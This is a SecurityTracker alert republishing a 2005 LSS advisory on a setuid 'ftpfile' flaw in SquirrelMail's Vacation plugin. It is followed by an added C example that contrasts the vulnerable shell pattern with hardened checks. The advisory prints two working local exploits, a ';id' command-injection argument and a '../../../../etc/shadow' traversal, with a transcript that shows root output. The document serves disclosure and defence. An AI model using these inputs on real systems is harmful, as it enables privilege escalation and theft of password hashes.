Squirrelmail Vacation Plugin Lets Local Users Execute Arbitrary Commands With Root Privileges
SecurityTracker Alert ID: 1012866
SecurityTracker URL: http://securitytracker.com/id/1012866
Date: Jan 13 2005
Disclosure of system information, Disclosure of user information, Execution of arbitrary code via local system, Root access via local system
A vulnerability was reported in Squirrelmail in the vacation plugin. A local user can view arbitrary files and execute arbitrary commands.
LSS reported that a local user can invoke the 'ftpfile' program to execute arbitrary commands with root privileges. The program, which is installed set-user-id (setuid) root, does not validate user-supplied command line arguments for shell meta-characters (such as ';') before passing them to an execve() call. A demonstration exploit is provided:
ftpfile 0 root 0 get 0 "LSS-Security;id"
A local user can also invoke ftpfile to copy arbitrary files with root privileges to the user's home directory, because the file name argument is not checked for directory traversal ('../'). A demonstration exploit is provided:
ftpfile localhost root root get ../../../../etc/shadow ./shadow
Leon Juranic is credited with discovering this flaw.
The vendor has been notified without response.
The original advisory is available at: http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03
A local user can execute arbitrary commands with root privileges.
A local user can copy arbitrary files with root privileges.
No solution was available at the time of this entry.
Vendor URL: www.squirrelmail.org/
Access control error, Input validation error
Underlying OS: Linux (Any), UNIX (Any)
Source Message Contents
Subject: Squirrelmail vacation v0.15 local root exploit
LSS Security Advisory #LSS-2005-01-03
Title : Squirrelmail vacation v0.15 local root exploit
Advisory ID : LSS-2005-01-03
Date : 10.01.2005.
Advisory URL : http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03
Impact : Privilege escalation and arbitrary file read
Risk level : High
Vulnerability type : Local
Vendors contacted : No response from vendor
The Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply
message for incoming email. This is commonly used to notify the sender of
the receiver's absence. The Vacation plugin specifically uses the Vacation program.
The plugin can be downloaded from:
Within the Squirrelmail Vacation plugin there is a suid root program, 'ftpfile'.
The program is used to access local files in the user's home directory. There is
a privilege escalation and arbitrary file read vulnerability in ftpfile.
Command line arguments are passed to the execve() function without checking
for meta-characters, therefore making it possible to execute commands as root.
[ljuranic@laptop ljuranic]$ id
uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$ ftpfile 0 root 0 get 0 "LSS-Security;id"
/bin/cp: omitting directory `/root/0'
uid=0(root) gid=513(ljuranic) groups=513(ljuranic)
It is also possible to read restricted files (such as /etc/shadow), since
ftpfile can copy a file from the user's home directory to any other
directory without checking the file name for a directory traversal attack.
$ ftpfile localhost root root get ../../../../etc/shadow ./shadow
./shadow
[ljuranic@laptop ljuranic]$ head ./shadow
===[ Affected versions
Squirrelmail Vacation v0.15 and previous versions.
Not available yet.
===[ PoC Exploit
Credits for this vulnerability go to Leon Juranic.
===[ LSS Security Contact
LSS Security Team, <eXposed by LSS>
WWW : http://security.lss.hr
E-mail : security@LSS.hr
Tel : +385 1 6129 775
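The two flaws the advisory describes (shell meta-characters reaching an exec call, and an unchecked relative path treated as a file in the user's home), shown beside the checks that close them. This is an added example written for this page; it is not code from LSS, from SquirrelMail or from the ftpfile program, and every function and variable name in it is hypothetical. It assumes the vulnerable program interpolated its arguments into an "sh -c" style command line, since a ';' in a filename only splits commands when a shell parses the string; the cp diagnostic in the PoC transcript is consistent with that, but the advisory does not show ftpfile's source.

```c
/* Added example, not code from the LSS advisory or from SquirrelMail's
 * ftpfile: the two mistakes the advisory describes, next to the checks
 * that close them. All names here are hypothetical; the vulnerable
 * pattern assumes the arguments end up in an "sh -c" style command line,
 * since ';' only splits commands when a shell parses the string. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

char *mkdtemp(char *template);   /* POSIX; prototype repeated for strict -std modes */

/* Flaw 1: a shell command line built from argv. With dst set to
 * "LSS-Security;id" (the advisory's PoC argument) the shell sees two
 * commands, and the second runs with the program's effective uid. This
 * function only builds the string so the reader can see what the shell
 * would receive; it executes nothing. */
static char *vulnerable_command(const char *src, const char *dst) {
    static char cmd[1024];
    snprintf(cmd, sizeof cmd, "/bin/cp %s %s", src, dst);
    return cmd;
}

/* Characters the Bourne shell treats specially; a filename containing any
 * of them must never reach a shell. */
static int has_shell_meta(const char *s) {
    return strpbrk(s, ";|&$`<>()\\\"'*?[]{}~!#\n\t ") != NULL;
}

/* Flaw 2: a "file in the user's home" accepted as a relative path, so
 * "../../../../etc/shadow" escapes the home directory. Only a single path
 * component other than "." and ".." is accepted. */
static int is_safe_basename(const char *name) {
    if (name == NULL || *name == '\0') return 0;
    if (strchr(name, '/') != NULL) return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return 0;
    return 1;
}

/* Hardened copy with no shell anywhere: validate both names, fork, drop
 * permanently to the real uid/gid of the invoking user (so the copy can
 * only read what that user could read anyway), then execve() /bin/cp with
 * a fixed argv. A ';' inside a name stays inside one argv element.
 * Returns cp's exit status (0 on success) or -1 if refused or failed. */
static int safe_copy(const char *home, const char *src, const char *dst) {
    if (!is_safe_basename(src) || !is_safe_basename(dst)) return -1;
    char srcpath[4096], dstpath[4096];
    snprintf(srcpath, sizeof srcpath, "%s/%s", home, src);
    snprintf(dstpath, sizeof dstpath, "%s/%s", home, dst);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0) _exit(127);
        char *const argv[] = { "/bin/cp", "--", srcpath, dstpath, NULL };
        char *const envp[] = { "PATH=/bin:/usr/bin", NULL };
        execve("/bin/cp", argv, envp);
        _exit(127);                   /* only reached if execve failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}

/* Self-check: a temporary directory stands in for the user's home and a
 * constructed file in it is copied; the traversal attempt from the PoC is
 * refused. Returns 1 when both outcomes hold. */
static int demo_in_tmpdir(void) {
    char home[] = "/tmp/ftpfile-demo-XXXXXX";
    if (mkdtemp(home) == NULL) return 0;
    char path[4096];
    snprintf(path, sizeof path, "%s/message.txt", home);
    FILE *f = fopen(path, "w");
    if (f == NULL) return 0;
    fputs("constructed sample file\n", f);
    fclose(f);
    int ok = safe_copy(home, "message.txt", "message.bak") == 0
          && safe_copy(home, "../../../../etc/shadow", "shadow") == -1;
    snprintf(path, sizeof path, "%s/message.bak", home);
    return ok && access(path, R_OK) == 0;
}

int main(void) {
    printf("shell would run: %s\n", vulnerable_command("/root/0", "LSS-Security;id"));
    printf("meta-characters present: %d\n", has_shell_meta("LSS-Security;id"));
    printf("traversal name accepted: %d\n", is_safe_basename("../../../../etc/shadow"));
    printf("hardened copy demo ok: %d\n", demo_in_tmpdir());
    return 0;
}
```

Build with `cc -Wall -o ftpfile-demo ftpfile-demo.c` and run it as an ordinary user; the privilege drop is a no-op when the binary is not setuid, so the self-check works without root. The practical point for an affected host, while no vendor fix exists: if the helper only needs to touch files in the invoking user's home directory, it does not need root at all, and `chmod u-s ftpfile` turns both the command injection and the traversal into things the user could already do under their own uid.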